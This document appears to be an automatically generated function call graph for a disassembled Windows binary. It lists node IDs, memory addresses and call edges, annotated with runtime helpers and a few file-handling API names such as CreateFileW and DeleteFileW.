107039->107043 107066 7ffd9444f6b2 107039->107066 107119 7ffd943ed050 107040->107119 107042->107040 107048 7ffd9444f6d3 107042->107048 107045 7ffd943c4c20 _raise_excf 11 API calls 107043->107045 107045->107066 107046 7ffd9444f7e1 107047 7ffd943ed050 11 API calls 107046->107047 107049 7ffd9444f800 107047->107049 107050 7ffd943c4c20 _raise_excf 11 API calls 107048->107050 107051 7ffd943ed050 11 API calls 107049->107051 107050->107066 107052 7ffd9444f81f 107051->107052 107054 7ffd943ed050 11 API calls 107052->107054 107053 7ffd9444fa11 107053->107036 107055 7ffd943c4c20 _raise_excf 11 API calls 107053->107055 107056 7ffd9444f846 107054->107056 107055->107036 107057 7ffd943ed050 11 API calls 107056->107057 107058 7ffd9444f86d 107057->107058 107059 7ffd9444f892 107058->107059 107060 7ffd9444f89e 107058->107060 107080 7ffd9444f91e 107058->107080 107214 7ffd944a2770 11 API calls _raise_excf 107059->107214 107215 7ffd944a57f0 12 API calls 2 library calls 107060->107215 107063 7ffd9444f89c 107064 7ffd9444f8f3 107063->107064 107065 7ffd9444fa1a 107063->107065 107068 7ffd9444f900 107064->107068 107216 7ffd944a3030 11 API calls _raise_excf 107064->107216 107133 7ffd9446df40 107065->107133 107066->107053 107191 7ffd944700e0 107066->107191 107067 7ffd9444f9da 107218 7ffd943d8730 11 API calls _raise_excf 107067->107218 107217 7ffd94479000 11 API calls _raise_excf 107068->107217 107072 7ffd9444fa40 107075 7ffd9444fa64 _raise_excf 107072->107075 107076 7ffd9444fa44 107072->107076 107074 7ffd9444f9f0 107219 7ffd943d8730 11 API calls _raise_excf 107074->107219 107168 7ffd944b15e0 107075->107168 107220 7ffd94478e50 11 API calls _raise_excf 107076->107220 107080->107066 107080->107067 107081 7ffd9444fa90 _raise_excf 107082 7ffd944b15e0 11 API calls 107081->107082 107083 7ffd9444fad5 107082->107083 107083->107080 107084 7ffd9444fb36 107083->107084 107221 7ffd94478e50 11 API calls _raise_excf 107083->107221 107177 7ffd943d3030 107084->107177 107088 7ffd9444fb61 107090 7ffd9444fb71 107088->107090 107091 7ffd9444fbb7 107088->107091 107223 7ffd943d8730 11 API calls _raise_excf 107090->107223 107093 7ffd9444fbaf 107091->107093 107104 7ffd9444fc05 107091->107104 107228 7ffd94478e50 11 API calls _raise_excf 107093->107228 107094 7ffd9444fb87 107224 7ffd943d8730 11 API calls _raise_excf 107094->107224 107095 7ffd9444fd4c 107098 7ffd9444fda2 107095->107098 107100 7ffd9444fd5f 107095->107100 107098->107080 107185 7ffd94465640 107098->107185 107226 7ffd943d8730 11 API calls _raise_excf 107100->107226 107102 7ffd9444fd75 107227 7ffd943d8730 11 API calls _raise_excf 107102->107227 107104->107095 107225 7ffd94479000 11 API calls _raise_excf 107104->107225 107106->107010 107107->107006 107109 7ffd944db8a0 _raise_excf 11 API calls 107108->107109 107112 7ffd944dbeaa 107109->107112 107110 7ffd944db8a0 _raise_excf 11 API calls 107114 7ffd944dbf5f 107110->107114 107111 7ffd944db8a0 _raise_excf 11 API calls 107116 7ffd944dc031 107111->107116 107112->107110 107113 7ffd944db8a0 _raise_excf 11 API calls 107115 7ffd944dbb32 107113->107115 107114->107111 107115->107029 107115->107032 107116->107113 107117->107018 107118->107022 107120 7ffd943ed079 107119->107120 107124 7ffd943ed0bf _raise_excf 107119->107124 107121 7ffd943ed082 107120->107121 107120->107124 107229 7ffd943d8730 11 API calls _raise_excf 107121->107229 107123 7ffd943ed0ac 107123->107046 107126 7ffd943ed11d 107124->107126 107132 7ffd943ed149 _raise_excf 107124->107132 107230 7ffd94479000 11 API calls _raise_excf 107126->107230 107127 7ffd943ed1ec 107131 7ffd943ed1f4 107127->107131 107232 7ffd94478e50 11 API calls _raise_excf 107127->107232 107129 7ffd943ed131 107129->107046 107131->107046 107231 7ffd9447fac0 11 API calls 2 library calls 107132->107231 107135 7ffd9446df8f 107133->107135 107134 7ffd944a1fc0 new[] 11 API calls 107141 7ffd9446e009 107134->107141 107135->107134 107136 7ffd9446e260 107137 7ffd944a1fc0 new[] 11 API calls 107136->107137 107163 7ffd9446e4bb 107136->107163 107139 7ffd9446e27d 107137->107139 107138 7ffd9446e0ad _raise_excf 107138->107072 107140 7ffd9446e552 107139->107140 107233 7ffd944a40d0 107139->107233 107143 7ffd943c4c20 _raise_excf 11 API calls 107140->107143 107141->107136 107141->107138 107144 7ffd944a1fc0 new[] 11 API calls 107141->107144 107145 7ffd9446e754 107143->107145 107146 7ffd9446e099 107144->107146 107147 7ffd943c4c20 _raise_excf 11 API calls 107145->107147 107148 7ffd9446e0a5 107146->107148 107152 7ffd9446e0d6 107146->107152 107147->107138 107149 7ffd943c4c20 _raise_excf 11 API calls 107148->107149 107149->107138 107150 7ffd9446e2ea _raise_excf 107158 7ffd9446e374 107150->107158 107150->107163 107167 7ffd943b36f0 20 API calls 107150->107167 107153 7ffd9446e128 107152->107153 107161 7ffd9446e0df _raise_excf 107152->107161 107154 7ffd943c4c20 _raise_excf 11 API calls 107153->107154 107155 7ffd9446e130 107154->107155 107157 7ffd943c4c20 _raise_excf 11 API calls 107155->107157 107156 7ffd943c4c20 _raise_excf 11 API calls 107156->107136 107157->107138 107158->107163 107259 7ffd944a4ea0 11 API calls _raise_excf 107158->107259 107160 7ffd9446e1f5 107160->107156 107161->107160 107162 7ffd9446e448 107161->107162 107164 7ffd943c4c20 _raise_excf 11 API calls 107162->107164 107163->107138 107163->107140 107260 7ffd944a38b0 107163->107260 107165 7ffd9446e47f 107164->107165 107166 7ffd943c4c20 _raise_excf 11 API calls 107165->107166 107166->107138 107167->107158 107169 7ffd944b15f9 _raise_excf 107168->107169 107170 7ffd944b1681 107168->107170 107172 7ffd944b162a _raise_excf 107169->107172 107173 7ffd944a1fc0 new[] 11 API calls 107169->107173 107171 7ffd944a1fc0 new[] 11 API calls 107170->107171 107171->107172 107174 7ffd944b16d2 107172->107174 107354 7ffd944a3030 11 API calls _raise_excf 107172->107354 107173->107172 107174->107081 107176 7ffd944b16c4 107176->107081 107178 7ffd943d305c 107177->107178 107355 7ffd9447fe30 107178->107355 107180 7ffd943d307f 107181 7ffd943d30a6 107180->107181 107365 7ffd943c4970 12 API calls _raise_excf 107180->107365 107181->107088 107222 7ffd944a3030 11 API calls _raise_excf 107181->107222 107183 7ffd943d30b9 107183->107181 107366 7ffd943ed270 11 API calls 2 library calls 107183->107366 107186 7ffd9446566d 107185->107186 107187 7ffd943c4c20 _raise_excf 11 API calls 107186->107187 107188 7ffd9446569a 107186->107188 107190 7ffd94465671 107186->107190 107187->107188 107189 7ffd944a1fc0 new[] 11 API calls 107188->107189 107188->107190 107189->107190 107190->107080 107190->107190 107192 7ffd94470104 107191->107192 107193 7ffd944700f6 107191->107193 107194 7ffd94470114 107192->107194 107203 7ffd94470167 _raise_excf 107192->107203 107193->107053 107404 7ffd943d8730 11 API calls _raise_excf 107194->107404 107196 7ffd9447012c 107405 7ffd943d8730 11 API calls _raise_excf 107196->107405 107197 7ffd9447024d 107369 7ffd944cec40 107197->107369 107200 7ffd94470156 107200->107053 107201 7ffd94470215 107201->107197 107407 7ffd944cddb0 11 API calls _raise_excf 107201->107407 107202 7ffd94470255 _raise_excf 107374 7ffd943e4410 107202->107374 107203->107201 107406 7ffd944cddb0 11 API calls _raise_excf 107203->107406 107207 7ffd94470270 107209 7ffd94470281 107207->107209 107212 7ffd944702c0 107207->107212 107408 7ffd94479000 11 API calls _raise_excf 107209->107408 107210 7ffd94470381 107210->107053 107380 7ffd944a0790 107212->107380 107213 7ffd94470294 107213->107053 107214->107063 107215->107063 107216->107068 107217->107080 107218->107074 107219->107053 107220->107080 107221->107084 107222->107088 107223->107094 107224->107093 107225->107104 107226->107102 107227->107080 107228->107098 107229->107123 107230->107129 107231->107127 107232->107131 107234 7ffd944a42a5 107233->107234 107239 7ffd944a415e 107233->107239 107236 7ffd944a1fc0 new[] 11 API calls 107234->107236 107242 7ffd944a4187 _raise_excf 107234->107242 107235 7ffd944a1fc0 new[] 11 API calls 107237 7ffd944a41ff 107235->107237 107251 7ffd944a42cc 107236->107251 107238 7ffd944a494e 107237->107238 107248 7ffd944a420b new[] _raise_excf 107237->107248 107241 7ffd943c4c20 _raise_excf 11 API calls 107238->107241 107256 7ffd944a43de _raise_excf 107238->107256 107240 7ffd944a1fc0 new[] 11 API calls 107239->107240 107239->107242 107240->107242 107241->107256 107242->107235 107242->107256 107243 7ffd944a443c 107257 7ffd944a44a0 _raise_excf 107243->107257 107272 7ffd943b4510 107243->107272 107244 7ffd944a4732 107244->107256 107291 7ffd94455910 107244->107291 107246 7ffd944a43d6 107249 7ffd943c4c20 _raise_excf 11 API calls 107246->107249 107248->107243 107254 7ffd943c4c20 _raise_excf 11 API calls 107248->107254 107249->107256 107251->107242 107251->107246 107251->107251 107251->107256 107289 7ffd9446fb50 11 API calls _raise_excf 107251->107289 107253 7ffd943c4c20 _raise_excf 11 API calls 107253->107256 107254->107243 107255 7ffd944a43c7 107255->107242 107255->107246 107256->107150 107257->107244 107290 7ffd944a4ea0 11 API calls _raise_excf 107257->107290 107259->107163 107262 7ffd944a38e3 _raise_excf 107260->107262 107306 7ffd944cf260 107262->107306 107264 7ffd944a3a14 _raise_excf 107266 7ffd94455910 _raise_excf 11 API calls 107264->107266 107265 7ffd944a39cd _raise_excf 107265->107264 107328 7ffd94451310 30 API calls _raise_excf 107265->107328 107267 7ffd944a3af3 107266->107267 107318 7ffd943bda70 107267->107318 107277 7ffd943b4561 107272->107277 107275 7ffd943b49d1 107276 7ffd943c4c20 _raise_excf 11 API calls 107275->107276 107288 7ffd943b49d9 _raise_excf 107276->107288 107277->107275 107278 7ffd943b47c0 CreateFileW 107277->107278 107281 7ffd943b4aac 107277->107281 107282 7ffd943c4c20 _raise_excf 11 API calls 107277->107282 107284 7ffd943b4a72 107277->107284 107277->107288 107295 7ffd944f28d0 107277->107295 107301 7ffd944f1210 20 API calls 2 library calls 107277->107301 107302 7ffd943b7490 19 API calls _raise_excf 107277->107302 107303 7ffd943d8730 11 API calls _raise_excf 107277->107303 107278->107277 107283 7ffd943c4c20 _raise_excf 11 API calls 107281->107283 107282->107277 107283->107288 107304 7ffd944f1a30 19 API calls _raise_excf 107284->107304 107286 7ffd943b4a9d 107305 7ffd9446fb50 11 API calls _raise_excf 107286->107305 107288->107257 107289->107255 107290->107244 107292 7ffd944559fd 107291->107292 107293 7ffd94455919 107291->107293 107292->107253 107293->107292 107294 7ffd943c4c20 _raise_excf 11 API calls 107293->107294 107294->107292 107296 7ffd944f2915 107295->107296 107297 7ffd944a1fc0 new[] 11 API calls 107296->107297 107299 7ffd944f2971 107296->107299 107298 7ffd944f292a new[] 107297->107298 107298->107299 107300 7ffd943c4c20 _raise_excf 11 API calls 107298->107300 107299->107277 107300->107299 107301->107277 107302->107277 107303->107277 107304->107286 107305->107288 107307 7ffd944cf3e1 107306->107307 107308 7ffd944cf28f 107306->107308 107307->107265 107312 7ffd944cf34f _raise_excf 107308->107312 107343 7ffd944cef90 30 API calls _raise_excf 107308->107343 107309 7ffd943c4c20 _raise_excf 11 API calls 107313 7ffd944cf3d9 107309->107313 107311 7ffd944cf3be 107311->107309 107312->107311 107329 7ffd943b4d70 107312->107329 107314 7ffd943c4c20 _raise_excf 11 API calls 107313->107314 107314->107307 107315 7ffd944cf303 107315->107312 107344 7ffd944e9310 11 API calls _raise_excf 107315->107344 107319 7ffd943bda86 107318->107319 107320 7ffd943bda8d 107318->107320 107353 7ffd94455bc0 11 API calls _raise_excf 107319->107353 107347 7ffd94455620 107320->107347 107324 7ffd943c4c20 _raise_excf 11 API calls 107325 7ffd943bdab6 107324->107325 107326 7ffd943c4c20 _raise_excf 11 API calls 107325->107326 107327 7ffd943bdabf 107326->107327 107328->107264 107330 7ffd944f28d0 11 API calls 107329->107330 107331 7ffd943b4d93 107330->107331 107332 7ffd943b4da5 GetFileAttributesW 107331->107332 107340 7ffd943b4d9b 107331->107340 107333 7ffd943b4e50 107332->107333 107342 7ffd943b4dc3 107332->107342 107336 7ffd943b4e8d 107333->107336 107341 7ffd943b4e67 107333->107341 107334 7ffd943b4dd8 DeleteFileW 107334->107336 107334->107342 107337 7ffd943b4e85 107336->107337 107346 7ffd943d8730 11 API calls _raise_excf 107336->107346 107339 7ffd943c4c20 _raise_excf 11 API calls 107337->107339 107339->107340 107340->107311 107345 7ffd944f1a30 19 API calls _raise_excf 107341->107345 107342->107333 107342->107334 107342->107341 107343->107315 107344->107312 107345->107337 107346->107337 107348 7ffd944556eb 107347->107348 107350 7ffd94455643 107347->107350 107349 7ffd943bdaad 107348->107349 107351 7ffd943c4c20 _raise_excf 11 API calls 107348->107351 107349->107324 107350->107348 107352 7ffd94455910 _raise_excf 11 API calls 107350->107352 107351->107349 107352->107350 107353->107320 107354->107176 107356 7ffd9447fe64 _raise_excf 107355->107356 107357 7ffd944a1fc0 new[] 11 API calls 107356->107357 107358 7ffd9447ff25 107356->107358 107359 7ffd9448000d new[] _raise_excf 107356->107359 107357->107359 107358->107180 107359->107358 107367 7ffd9449d070 11 API calls 2 library calls 107359->107367 107361 7ffd94480098 107361->107358 107362 7ffd943c4c20 _raise_excf 11 API calls 107361->107362 107363 7ffd944800b8 _raise_excf 107361->107363 107362->107363 107368 7ffd944a3030 11 API calls _raise_excf 107363->107368 107365->107183 107366->107181 107367->107361 107368->107358 107370 7ffd944cec56 _raise_excf 107369->107370 107371 7ffd944ced1a 107369->107371 107370->107371 107373 7ffd943c4c20 _raise_excf 11 API calls 107370->107373 107409 7ffd944ce800 11 API calls _raise_excf 107370->107409 107371->107202 107373->107370 107375 7ffd943e442f 107374->107375 107379 7ffd943e44b9 _raise_excf 107374->107379 107376 7ffd943e4498 107375->107376 107410 7ffd944ceb70 11 API calls _raise_excf 107375->107410 107378 7ffd943c4c20 _raise_excf 11 API calls 107376->107378 107376->107379 107378->107379 107379->107207 107381 7ffd944a07a5 107380->107381 107403 7ffd944a0d62 _raise_excf 107380->107403 107381->107403 107411 7ffd944af170 107381->107411 107383 7ffd944a0851 107384 7ffd944a0863 107383->107384 107433 7ffd944b1490 11 API calls 2 library calls 107383->107433 107386 7ffd944cec40 _raise_excf 11 API calls 107384->107386 107388 7ffd944a086b 107386->107388 107434 7ffd94471da0 11 API calls _raise_excf 107388->107434 107389 7ffd944a0802 _raise_excf 107389->107383 107419 7ffd9446c010 107389->107419 107393 7ffd944a0873 _raise_excf 107435 7ffd9449cf90 11 API calls _raise_excf 107393->107435 107394 7ffd944a0d0d 107438 7ffd9449cf90 11 API calls _raise_excf 107394->107438 107396 7ffd944a0d19 107396->107403 107439 7ffd94478e50 11 API calls _raise_excf 107396->107439 107399 7ffd944a0a86 _raise_excf 107436 7ffd9449cf90 11 API calls _raise_excf 107399->107436 107400 7ffd944a0d39 107400->107403 107440 7ffd944e27e0 11 API calls _raise_excf 107400->107440 107401 7ffd944a0bc2 _raise_excf 107401->107394 107437 7ffd943ee530 11 API calls _raise_excf 107401->107437 107403->107210 107404->107196 107405->107200 107406->107203 107407->107201 107408->107213 107409->107370 107410->107375 107414 7ffd944af19f _raise_excf 107411->107414 107412 7ffd944af20f 107413 7ffd943e4410 _raise_excf 11 API calls 107412->107413 107416 7ffd944af221 107413->107416 107414->107412 107441 7ffd9446e8c0 107414->107441 107418 7ffd944af27f _raise_excf 107416->107418 107453 7ffd944ae870 11 API calls _raise_excf 107416->107453 107418->107389 107420 7ffd9446c028 _raise_excf 107419->107420 107421 7ffd9446e8c0 _raise_excf 30 API calls 107420->107421 107425 7ffd9446c043 _raise_excf 107421->107425 107422 7ffd944a38b0 _raise_excf 32 API calls 107423 7ffd9446c136 107422->107423 107424 7ffd9446c15c 107423->107424 107426 7ffd943c4c20 _raise_excf 11 API calls 107423->107426 107427 7ffd94455910 _raise_excf 11 API calls 107424->107427 107429 7ffd9446c178 107424->107429 107425->107422 107430 7ffd9446c18b 107425->107430 107426->107424 107427->107429 107428 7ffd943c4c20 _raise_excf 11 API calls 107428->107430 107429->107428 107431 7ffd943c4c20 _raise_excf 11 API calls 107430->107431 107432 7ffd9446c1ba 107431->107432 107432->107389 107433->107384 107434->107393 107435->107399 107436->107401 107437->107401 107438->107396 107439->107400 107440->107403 107443 7ffd9446e8e7 _raise_excf 107441->107443 107442 7ffd9446e911 107446 7ffd9446e937 107442->107446 107459 7ffd9446f8b0 29 API calls _raise_excf 107442->107459 107443->107442 107458 7ffd94462250 29 API calls _raise_excf 107443->107458 107450 7ffd9446e9dd _raise_excf 107446->107450 107460 7ffd944a4a30 30 API calls _raise_excf 107446->107460 107449 7ffd9446e9fa _raise_excf 107449->107414 107454 7ffd943e2d90 107450->107454 107451 7ffd9446e953 _raise_excf 107451->107450 107461 7ffd94451310 30 API calls _raise_excf 107451->107461 107453->107418 107457 7ffd943e2dbd _raise_excf 107454->107457 107455 7ffd943e2dca 107455->107449 107455->107455 107457->107455 107462 7ffd94451310 30 API calls _raise_excf 107457->107462 107458->107442 107459->107446 107460->107451 107461->107450 107462->107455 107463 7ffd943c6570 107466 7ffd944a1b00 107463->107466 107465 7ffd943c6597 107467 7ffd944a1b7e 107466->107467 107468 7ffd944a1b2b 107466->107468 107467->107468 107469 7ffd944a1b9e 107467->107469 107520 7ffd943d8730 11 API calls _raise_excf 107468->107520 107471 7ffd944a1b43 107469->107471 107474 7ffd944a1ba3 _raise_excf 107469->107474 107521 7ffd943d8730 11 API calls _raise_excf 107471->107521 107473 7ffd944a1b6d 107473->107465 107476 7ffd944a1c31 _raise_excf 107474->107476 107480 7ffd944abaa0 107474->107480 107522 7ffd944ae910 11 API calls 2 library calls 107474->107522 107477 7ffd944a1c70 107476->107477 107523 7ffd943dee90 11 API calls _raise_excf 107476->107523 107477->107465 107481 7ffd944abb0f new[] 107480->107481 107482 7ffd944abb89 107481->107482 107495 7ffd944abba7 _raise_excf 107481->107495 107544 7ffd94478ea0 11 API calls _raise_excf 107482->107544 107484 7ffd944abc7b 107485 7ffd944abc97 107484->107485 107487 7ffd944cec40 _raise_excf 11 API calls 107484->107487 107488 7ffd944abdc1 107485->107488 107490 7ffd944abcae 107485->107490 107487->107485 107524 7ffd944b0440 107488->107524 107489 7ffd944ac0b6 _raise_excf 107489->107474 107492 7ffd944abcb7 107490->107492 107499 7ffd944abd04 _raise_excf 107490->107499 107545 7ffd94479000 11 API calls _raise_excf 107492->107545 107494 7ffd944abccb 107546 7ffd943dee90 11 API calls _raise_excf 107494->107546 107495->107484 107498 7ffd944abcdf 107495->107498 107497 7ffd944abf76 107513 7ffd944abb9a _raise_excf 107497->107513 107553 7ffd944e28b0 11 API calls _raise_excf 107497->107553 107547 7ffd94479000 11 API calls _raise_excf 107498->107547 107511 7ffd944b0440 _raise_excf 12 API calls 107499->107511 107515 7ffd944abd64 _raise_excf 107499->107515 107500 7ffd944abe79 107503 7ffd944abe54 107500->107503 107548 7ffd944622f0 32 API calls _raise_excf 107500->107548 107502 7ffd944abeba 107505 7ffd944abecc 107502->107505 107506 7ffd944abf50 107502->107506 107503->107502 107504 7ffd944abeb2 107503->107504 107549 7ffd944ccc90 36 API calls _raise_excf 107503->107549 107550 7ffd944beeb0 11 API calls _raise_excf 107504->107550 107551 7ffd94479000 11 API calls _raise_excf 107505->107551 107506->107513 107552 7ffd94478e50 11 API calls _raise_excf 107506->107552 107516 7ffd944abd45 107511->107516 107554 7ffd944a55a0 11 API calls _raise_excf 107513->107554 107515->107497 107515->107500 107515->107503 107516->107515 107518 7ffd943c4c20 _raise_excf 11 API calls 107516->107518 107517 7ffd944abedd 107517->107513 107519 7ffd943c4c20 _raise_excf 11 API calls 107517->107519 107518->107515 107519->107513 107520->107471 107521->107473 107522->107474 107523->107477 107536 7ffd944b0490 _raise_excf 107524->107536 107526 7ffd944b07e1 _raise_excf 107527 7ffd943c4c20 _raise_excf 11 API calls 107526->107527 107533 7ffd944b0839 107526->107533 107527->107533 107528 7ffd944b08fc 107571 7ffd943d8730 11 API calls _raise_excf 107528->107571 107529 7ffd944b0919 107531 7ffd943c4c20 _raise_excf 11 API calls 107529->107531 107539 7ffd944b0932 107531->107539 107532 7ffd944b08a5 107569 7ffd94478ea0 11 API calls _raise_excf 107532->107569 107533->107528 107533->107529 107570 7ffd944a1f90 11 API calls _raise_excf 107533->107570 107534 7ffd944b095f 107542 7ffd944b097c 107534->107542 107573 7ffd94477590 11 API calls _raise_excf 107534->107573 107536->107526 107536->107532 107555 7ffd944a5f60 107536->107555 107538 7ffd944b099a _raise_excf 107538->107515 107539->107534 107572 7ffd943ee530 11 API calls _raise_excf 107539->107572 107542->107538 107543 7ffd943c4c20 _raise_excf 11 API calls 107542->107543 107543->107538 107544->107513 107545->107494 107546->107513 107547->107513 107548->107503 107549->107504 107550->107502 107551->107517 107552->107513 107553->107513 107554->107489 107559 7ffd944a5fa1 _raise_excf 107555->107559 107556 7ffd944a608e 107557 7ffd944a60e8 107556->107557 107558 7ffd944a6098 107556->107558 107562 7ffd944a6117 107557->107562 107563 7ffd944a612a 107557->107563 107567 7ffd944a60c3 _raise_excf 107557->107567 107558->107567 107575 7ffd944f7490 12 API calls 2 library calls 107558->107575 107559->107556 107565 7ffd944a60ad 107559->107565 107574 7ffd944f7490 12 API calls 2 library calls 107559->107574 107577 7ffd94478ea0 11 API calls _raise_excf 107562->107577 107578 7ffd94478ea0 11 API calls _raise_excf 107563->107578 107565->107567 107576 7ffd944f75d0 11 API calls _raise_excf 107565->107576 107567->107536 107569->107526 107570->107528 107571->107529 107572->107534 107573->107542 107574->107559 107575->107565 107576->107567 107577->107567 107578->107567 107579 7ffd943b4ef0 107580 7ffd943b5022 107579->107580 107581 7ffd943b4f11 107579->107581 107581->107580 107583 7ffd944f2200 107581->107583 107584 7ffd944f253f _raise_excf 107583->107584 107585 7ffd944f223e 107583->107585 107584->107580 107585->107584 107587 7ffd943b4d70 21 API calls 107585->107587 107590 7ffd944f257d 107585->107590 107593 7ffd944f2700 107585->107593 107602 7ffd944f10a0 11 API calls _raise_excf 107585->107602 107603 7ffd943d8730 11 API calls _raise_excf 107585->107603 107587->107585 107604 7ffd944fb834 8 API calls 107590->107604 107592 7ffd944f2582 107594 7ffd944f2712 107593->107594 107597 7ffd944f2758 107593->107597 107596 7ffd944f2723 107594->107596 107594->107597 107595 7ffd944f27b7 107595->107585 107605 7ffd944f1a30 19 API calls _raise_excf 107596->107605 107597->107595 107606 7ffd944f1a30 19 API calls _raise_excf 107597->107606 107600 7ffd944f2752 107600->107585 107601 7ffd944f27b1 107601->107585 107602->107585 107603->107585 107604->107592 107605->107600 107606->107601 107607 7ffd944b5d90 107609 7ffd944b5db6 107607->107609 107613 7ffd944b5e8e 107607->107613 107608 7ffd944b5df7 107617 7ffd944cfa20 107608->107617 107609->107608 107610 7ffd944cfa20 36 API calls 107609->107610 107609->107613 107610->107608 107614 7ffd944cfa20 36 API calls 107615 7ffd944b5e5a 107614->107615 107615->107613 107616 7ffd944cfa20 36 API calls 107615->107616 107616->107613 107618 7ffd944b5e21 107617->107618 107622 7ffd944cfa37 107617->107622 107618->107613 107618->107614 107619 7ffd944cf940 36 API calls 107619->107622 107621 7ffd944cfa20 36 API calls 107621->107622 107622->107618 107622->107619 107622->107621 107624 7ffd94462570 107622->107624 107654 7ffd944ea3f0 36 API calls 107622->107654 107632 7ffd944625c9 107624->107632 107645 7ffd944625c5 _raise_excf 107624->107645 107625 7ffd94462a25 107625->107632 107712 7ffd944ac3a0 11 API calls 2 library calls 107625->107712 107627 7ffd944cfa20 36 API calls 107627->107645 107629 7ffd94463a36 107715 7ffd943f35a0 11 API calls _raise_excf 107629->107715 107632->107622 107633 7ffd94463a4e 107633->107632 107716 7ffd94478ea0 11 API calls _raise_excf 107633->107716 107636 7ffd94462b65 107714 7ffd94478ea0 11 API calls _raise_excf 107636->107714 107639 7ffd94462b4e 107713 7ffd94478ea0 11 API calls _raise_excf 107639->107713 107641 7ffd94478ea0 11 API calls _raise_excf 107652 7ffd94462a42 _raise_excf 107641->107652 107642 7ffd944a1fc0 11 API calls new[] 107642->107645 107645->107625 107645->107627 107645->107632 107645->107636 107645->107639 107645->107642 107647 7ffd94478ea0 11 API calls _raise_excf 107645->107647 107655 7ffd9445cd40 107645->107655 107694 7ffd944a18e0 107645->107694 107707 7ffd944a1f90 11 API calls _raise_excf 107645->107707 107708 7ffd944724b0 12 API calls 2 library calls 107645->107708 107709 7ffd944e5f40 36 API calls _raise_excf 107645->107709 107710 7ffd944b63d0 36 API calls _raise_excf 107645->107710 107711 7ffd9449d7c0 11 API calls _raise_excf 107645->107711 107647->107645 107648 7ffd9447ef80 11 API calls 107648->107652 107649 7ffd944a1f90 11 API calls _raise_excf 107649->107652 107650 7ffd9447dd50 11 API calls _raise_excf 107650->107652 107651 7ffd9447f070 11 API calls 107651->107652 107652->107629 107652->107632 107652->107633 107652->107641 107652->107648 107652->107649 107652->107650 107652->107651 107653 7ffd943ed830 11 API calls 107652->107653 107653->107652 107654->107622 107656 7ffd9445cd79 107655->107656 107681 7ffd9445ce2a _raise_excf 107655->107681 107657 7ffd9445ce1f 107656->107657 107658 7ffd9445ce8a 107656->107658 107656->107681 107717 7ffd94478ea0 11 API calls _raise_excf 107657->107717 107659 7ffd9445ce90 107658->107659 107660 7ffd9445cea9 107658->107660 107718 7ffd94478ea0 11 API calls _raise_excf 107659->107718 107663 7ffd944a1fc0 new[] 11 API calls 107660->107663 107664 7ffd9445ceae _raise_excf 107660->107664 107663->107664 107665 7ffd944a1fc0 new[] 11 API calls 107664->107665 107666 7ffd9445cf51 107664->107666 107667 7ffd9445cf07 _raise_excf 107664->107667 107664->107681 107665->107667 107670 7ffd944a1fc0 new[] 11 API calls 107666->107670 107676 7ffd9445cf72 _raise_excf 107666->107676 107675 7ffd9445cf7a 107667->107675 107719 7ffd944a6170 11 API calls 2 library calls 107667->107719 107669 7ffd9445d08b 107673 7ffd9445d0ad 107669->107673 107669->107681 107687 7ffd9445d0cb 107669->107687 107670->107676 107672 7ffd9445cf4c 107672->107666 107672->107675 107721 7ffd94478ea0 11 API calls _raise_excf 107673->107721 107674 7ffd9445d0ed 107679 7ffd9445d124 107674->107679 107680 7ffd9445d2e0 107674->107680 107677 7ffd943c4c20 _raise_excf 11 API calls 107675->107677 107675->107681 107720 7ffd944b63d0 36 API calls _raise_excf 107676->107720 107677->107681 107682 7ffd944cfa20 36 API calls 107679->107682 107683 7ffd944cfa20 36 API calls 107680->107683 107681->107645 107684 7ffd9445d13c 107682->107684 107683->107684 107684->107681 107685 7ffd9445d30d 107684->107685 107688 7ffd9445d1a4 107684->107688 107724 7ffd944724b0 12 API calls 2 library calls 107685->107724 107687->107674 107692 7ffd9445d2bf 107687->107692 107722 7ffd94478ea0 11 API calls _raise_excf 107688->107722 107689 7ffd9445d320 107689->107681 107691 7ffd944cfa20 36 API calls 107689->107691 107691->107681 107723 7ffd94478ea0 11 API calls _raise_excf 107692->107723 107695 7ffd944a190c 107694->107695 107705 7ffd944a1911 _raise_excf 107694->107705 107725 7ffd944ad630 107695->107725 107697 7ffd944a1a0a 107698 7ffd944a1a66 107697->107698 107699 7ffd944a1a50 107697->107699 107703 7ffd944a1a0e 107697->107703 107732 7ffd94478ea0 11 API calls _raise_excf 107698->107732 107731 7ffd94478ea0 11 API calls _raise_excf 107699->107731 107702 7ffd944a19f7 107702->107697 107730 7ffd944cdef0 11 API calls 2 library calls 107702->107730 107703->107645 107705->107697 107705->107702 107705->107703 107729 7ffd944cdc00 11 API calls 2 library calls 107705->107729 107707->107645 107708->107645 107709->107645 107710->107645 107711->107645 107712->107652 107713->107632 107714->107632 107715->107633 107716->107632 107717->107681 107718->107681 107719->107672 107720->107669 107721->107681 107722->107681 107723->107681 107724->107689 107726 7ffd944ad649 107725->107726 107727 7ffd944ad655 107725->107727 107733 7ffd9449da40 107726->107733 107727->107705 107729->107702 107730->107697 107731->107703 107732->107703 107734 7ffd9449da7c 107733->107734 107735 7ffd9449da89 107733->107735 107739 7ffd9449de10 107734->107739 107737 7ffd9449dadd 107735->107737 107738 7ffd9449de10 _raise_excf 36 API calls 107735->107738 107737->107727 107738->107735 107769 7ffd9449db10 107739->107769 107741 7ffd9449dec4 _raise_excf 107745 7ffd9449deeb _raise_excf 107741->107745 107750 7ffd9449df54 _raise_excf 107741->107750 107751 7ffd9449df59 _raise_excf 107741->107751 107804 7ffd943e2010 107741->107804 107742 7ffd9449e370 107822 7ffd944ae910 11 API calls 2 library calls 107742->107822 107745->107735 107747 7ffd9449df39 107748 7ffd9449df3f _raise_excf 107747->107748 107747->107751 107815 7ffd944b6190 11 API calls 2 library calls 107748->107815 107750->107742 107750->107745 107821 7ffd944a3030 11 API calls _raise_excf 107750->107821 107752 7ffd9449dfc4 _raise_excf 107751->107752 107756 7ffd9449e00e _raise_excf 107751->107756 107753 7ffd9449e20a 107752->107753 107761 7ffd9449e15f _raise_excf 107752->107761 107766 7ffd9449dfe9 _raise_excf 107752->107766 107816 7ffd944a1f90 11 API calls _raise_excf 107753->107816 107755 7ffd9449e243 107817 7ffd943c2f50 36 API calls 2 library calls 107755->107817 107759 7ffd943c4c20 _raise_excf 11 API calls 107756->107759 107756->107766 107759->107766 107760 7ffd9449e297 _raise_excf 107763 7ffd9449e2f4 107760->107763 107818 7ffd944690d0 36 API calls _raise_excf 107760->107818 107762 7ffd943c4c20 _raise_excf 11 API calls 107761->107762 107761->107766 107762->107766 107763->107766 107819 7ffd944ae870 11 API calls _raise_excf 107763->107819 107764 7ffd9449e271 107764->107760 107767 7ffd943c4c20 _raise_excf 11 API calls 107764->107767 107766->107750 107820 7ffd9446c1d0 32 API calls _raise_excf 107766->107820 107767->107760 107770 7ffd9449ddc5 